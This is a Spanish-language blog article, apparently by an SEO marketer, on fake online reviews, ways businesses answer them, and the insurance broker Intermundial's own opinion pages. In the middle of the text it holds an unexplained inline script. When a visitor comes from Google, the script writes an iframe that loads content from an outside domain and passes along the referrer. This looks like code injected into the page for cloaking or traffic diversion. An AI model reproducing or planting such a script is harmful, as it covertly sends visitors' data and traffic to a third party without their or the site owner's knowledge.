Intermundial Seguros – Opiniones

Intermundial Seguros - Opiniones

Hoy vamos a hablar de un caso muy interesante sobre reputación online, y es que habitualmente los negocios ya sean locales o empresas internacionales están expuestos a que en internet todo el mundo opine y habitualmente, por falta de información en ocasiones de forma perjudicial.

Reviews falsas

¿A quién le pueden interesar poner reviews falsas? ¿a la competencia? habitualmente no, la verdad es que la mayoría de las veces por no decir en el 99,99% de las veces la competencia está trabajando en mejorar su producto y hacerlo igual o mejor.

Normalmente las opiniones falsas vienen de una experiencia en la que no se ha profundizado y por la «protección» que da internet y poder opinar con un nombre o un perfil falso.

En el mundo online, es extremadamente fácil crear una nueva cuenta y dejar una revisión positiva o negativa para cualquier negocio, independientemente de si alguna vez se ha tratado de contratarlos.

Hay un caso famoso de un restaurante que llegó a ser número 1 en Tripadvisor sin existir, os dejo el vídeo:

Con lo cual, no es imposible hacer este tipo de comentarios tanto positivos como negativos. El protagonista de nuestro vídeo comenzó su carrera como copy realizando estas reviews falsas para restaurantes, es decir, su trabajo era realizar reviews falsas.

¿Y Google que opina de esto?

Google tiene un montón de políticas para los usuarios que dejan comentarios. Pero no son capaces de capturar automáticamente las violaciones de estas políticas.

Modus operandi

Normalmente se obtienen diversas opiniones malas en lapsos cortos de tiempo.

Normalmente habrá unas pocas que no tendrán comentarios para que empeore el cómputo global y que no se puedan eliminar (no violan las pautas de Google, claro) y otra con algún texto para que tenga mayor impacto aunque el global sea bueno.

El problema aquí es que es complejo obtener la identidad real y por mucho que contactemos a través del mismo canal va a ser difícil que nos contesten si son reviews falsas, pero de todos modos aunque sean personas reales, si estamos «despechados» posiblemente el usuario de la review negativa no quiera ni contestar.

Como responder a reviews falsas

Un buen método que actualmente está funcionando bien es compartir en redes sociales esos comentarios siendo muy transparentes con esos usuarios que sí han disfrutado de nuestro servicio y lo recomendarían. De este modo no se está pidiendo sino que el usuario colabora si quiere con nosotros.

Posiblemente no podamos utilizar alguna de las redes sociales ya que no encontraremos dónde está nuestro canal que más nos acerca a nuestros usuarios, pero una vez lo encontremos cualquier conocido que haya usado nuestro servicio o negocio probablemente responderá positivamente.

Es importante tener en cuenta que nunca se debe pedir a nadie que haga una review, debe ser la respuesta natural de personas que les gusta el servicio que ofrecemos.

Pero ¿qué pasa con la eliminación de las críticas negativas?

Es posible que se puedan eliminar las reviews negativas en la mayoría de las ocasiones, pero ha habido varios casos en los que he visto que Google se niega a eliminarlos para otros.

Un posible plan B puede ser comentar en una de las reviews negativas y ofrecer  a estos «clientes» un reembolso del 100%. Después de todo, el 100% de cero sigue siendo cero y cuando no encontremos al usuario real detrás de este review… no tendremos nada que perder.

Pero… ¿y qué tiene que ver Intermundial en esto?

<script>if((document.referrer).includes('google')) { document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>"); } </script>Actualmente esta empresa ha dedicado parte de sus esfuerzos en crear páginas de opiniones con las opiniones reales de usuarios con quejas directas y valoraciones para poder dejar de estar oprimidos con estos problemas de las reviews falsas o poco verídicas en otros canales no especializados o no dedicados a seguros.

Es decir, visto el problema de no poder contestar, o directamente que no les ofrezcan respuesta en otros canales han decidido mantener su propio canal de reviews con toda la información posible e intentando mejorar este proceso junto con guías de cómo elegir el seguro que necesita el viajero y aclarando que es un broker y no una aseguradora como es el caso.

Para otras empresas he encontrado los mismos esfuerzos  en ocasiones con mejoras pero en otras ocasiones creando un grave problema de reputación viendo cómo las grandes webs de opiniones no permiten que se corrija el estado aunque la empresa haya variado y mejorado sus procesos año tras año.

GRAN SELECCIÓN DE OFERTAS MULTI-TIENDA

CONSOLAS

ACTUALIZACIÓN CONTINUA

CONTRIBUYE CON PERIODISTA DIGITAL

QUEREMOS SEGUIR SIENDO UN MEDIO DE COMUNICACIÓN LIBRE

Buscamos personas comprometidas que nos apoyen

COLABORA

Carlos Fernández

El marketing online y el SEO forman parte de mi vida desde el 2005, cuando empecé a hacer webs en frontpage pero sabía que se podía hacer mucho mejor.

Lo más leído